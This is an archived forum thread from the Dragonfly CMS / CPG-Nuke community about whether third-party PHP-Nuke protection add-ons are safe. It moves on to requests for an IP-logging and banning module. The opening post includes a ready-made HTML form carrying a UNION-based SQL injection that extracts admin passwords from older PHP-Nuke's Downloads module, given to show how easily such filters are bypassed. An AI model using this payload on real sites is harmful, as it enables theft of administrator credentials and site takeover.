Dragonfly CMS v9 ⇒ Security v9 :: Archives ⇒ Can i use Sentinell, Fortress, Protector, Admin Secure ? :: Archived ⇒ Community Forums ⇒ CPG Dragonfly™ CMS
Forum IndexSecurity v9

Archived ⇒ Can i use Sentinell, Fortress, Protector, Admin Secure ?


Yes you can try.

Is it safe ? NO
Why not ? People can bypass the protectors in 5 seconds, and if you want proove here it is:
<form action="http://YOURSITE.com/html/modules.php?name=Downloads&d_op=viewdownload" method="post"> <textarea name="cid">2 UNION select counter, aid, pwd FROM nuke_authors</textarea> <input type="submit"></form>This is example code and won't work in the latest versions PHP-Nuke, but older versions are affected. CPG-Nuke is uneffected.

Rectification:
Protector System of Mister does scan POST commands as well, so that's secure

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial

Last edited by DJ Maze on Sun Aug 29, 2004 10:47 pm; edited 1 time in total


So nothing is secure? Why even make those protection programs then? I was thinking about installing Sentinel because it looks like the best one so far. I'm confused.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.4/4.3.11


CPG-Nuke is secure compared to what these programs provide...

AKA Akamu / Read these and your life will be successful | Find a Repair
--
Mods and Professional Support via YIM

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
win32 / Apache 1.3.33 / MySQL 4.1.16/PHP 4.4/CPG-CVS ( browsers: Mozilla 1.7.x / IE6 / Opera 8.0)


Rectification:
Protector System of Mister does scan POST commands as well, so that's secure

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial


So nothing is secure? Why even make those protection programs then? I was thinking about installing Sentinel because it looks like the best one so far. I'm confused.


Well, they make these for PHPNuke because, frankly, with PHPNuke any security is better than none at all. I run Protector with CPGNuke but not for security. I run it because it is a convenient way for me to gather data on my problem users and ban them. One shortcoming CPGNuke seems to have is that it lacks a security control interface (like protector's) which allows an admin to see a user's IP and ban them from the site using a simple GUI. Editing .htaccess is too much of a PITA, in my opinion.

Is this security related? For me, no. It has less to do with site security and more to do with my having the ability to easilly rid my site of troublemakers. The forum bans are fine but, unfortunately, they do not keep them off of the main site where the shoutblock is located. This has been an issue for me in the past because I host a gaming site which, naturally, means that many of my members are younger and immature. CPG shoutblock bans didn't work in 8.2a. I am not sure if this was corrected in 8.2b, but knowing the CPG Team, I am sure that if it wasn't, it is at least in the works now.

A CPG security module which allows us to keep track of users IP's, as well as other statistics like operating systems, screen resolutions, countries, etc would be a VERY welcomed addition to CPG. I realize that the stats mod can do some of this but an all-in-one security module with banning functions (which ban in both the site and forums in one easy stroke) would be more convenient. Would it make CPG more secure? The answer has to be yes. Any time an admin is given increased ability to monitor his server it can only serve to enhance his security and his awareness of what is transpiring on his server. Sure, CPG can handle itself very well but I prefer to have the ability to do my own monitoring as well. (Again, knowing the CPG Team and their commitment to security, I am pretty sure such module has been considered already or maybe even has been started on).

In the end, a server is only as secure as it's admin. Such a tool would greatly enhance the admin's ability to actively monitor his site and would add a less-automated human touch to CPG security. Even in the case of a poor administrator, such module has no downside. He is no worse off having it and only stands to benefit from it.

In the end, using any module created for PHPNuke with CPGNuke can potentially be a security hazard (yes, even Protector itself). Of the hundreds of hack attempts on my site the only successful one was a hack which hit my only PHPNuke module on the site. Fortunately, CPGNuke protected my other database tables and the damage was laughable. I had the site back up in 15 minutes and was here laughing at the hacker's stupid attempt. That day I removed the offending PHPNuke module and haven't looked back ever since. I recently moved and didn't monitor my site for an entire week. I didn't lose one wink of sleep because I knew the site would still be up and running when I returned. My faith in CPGNuke security was justified...

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢

Last edited by Eccentricity R.I.P. on Wed Sep 15, 2004 11:52 pm; edited 1 time in total


Persistence, you bring up a highly discussed idea. The issue that we face when considering such an enhancement is that logging slows down page generation times. Our standards are to keep page generation times down and keep the hackers away, so this idea will stir up mixed emotions, as far as speed is concerned. We're always looking for new features to add, and we hope that our new version will suit the needs of our users, even though it doesn't include active logging

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux / 1.3.34 / 4.1.18 / 4.4.2 / CVS


Agreed. However, I believe that offering the module as a seperate download would solve this issue. I am not suggesting incorporating it into the CMS directly and, hence, forcing it on everyone. I am suggesting offering it as an option to those who care more for security than speed.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


such an enhancement is that logging slows down page generation times.


Thats the benefit of modularizing it. Those who are willing to sacrific the speed can, those that don't want it, don't have to.

Personally I think the biggest weakness of phpBB is lack of moderation tools. vB, IPB, SMF all have much more to offer. Has there been any improvement in phpBB 2.x that worth integrating in?

NEMINI.org, NEMINI.us, NEMINI.info, NYMINI.org

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
1.3.34 (Unix)/4.1.18-standard/4.4.2 /9.1.0.8 CVS


I am moving the site to a Quad 3GHZ Xeon Server in October and I seriously doubt that I will take very much of a performance hit as I will be the only site on the server. For me it is worth the .100 second hit (or less) which I might take. Even if I choose to not use my own server and use my hosts 2.8GHZ I doubt that a dedicated server will suffer much. Those on shared plans will, however.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


The fact that so many users are using these other systems does highlight a need. I also track users, and if it is included as an option, then let people choose and live with the consequences. After all, they're doing it anyway, with risky non-cpgnuke products.

htaccess is a pain and so is searching website logs.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):


Exactly. When CPG develops their own module I will dump Protector on it's arse. I have absolutely no faith in PHPNuke products. I do not intend offense toward it's developers when I say that. Many of those modules aren't written by developers, but by third parties who are not directly involved with PHPNuke development. I only trust CPG-made products. I do not even fully trust my theme (which I ported myself) although I doubt it has any security holes.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


To track users I use MS-Analysis. I like how it works but I wish it had the ability to ban IP addresses and/or users. You can exclude IP and/or Users from the stats. I know that speed is an issue but it can run Dynamically or Statically. I am thinking about using Protector for now so that if I need to BAN IPs I can.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c


Exactly. When CPG develops their own module I will dump Protector on it's arse.


LMAO mister and i are thinking to create a protector module especialy for CPG-Nuke as add-on.

He has some ideas and i pointed him wot is good Wink

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial


Great news - even though you have negated the need for the bulk of what protector does, a smaller adaptation will stop people dabbling with all the other crap that is around.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):


Exactly. When CPG develops their own module I will dump Protector on it's arse.


LMAO mister and i are thinking to create a protector module especialy for CPG-Nuke as add-on.

He has some ideas and i pointed him wot is good Wink


That would be cool!

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c

All times are UTC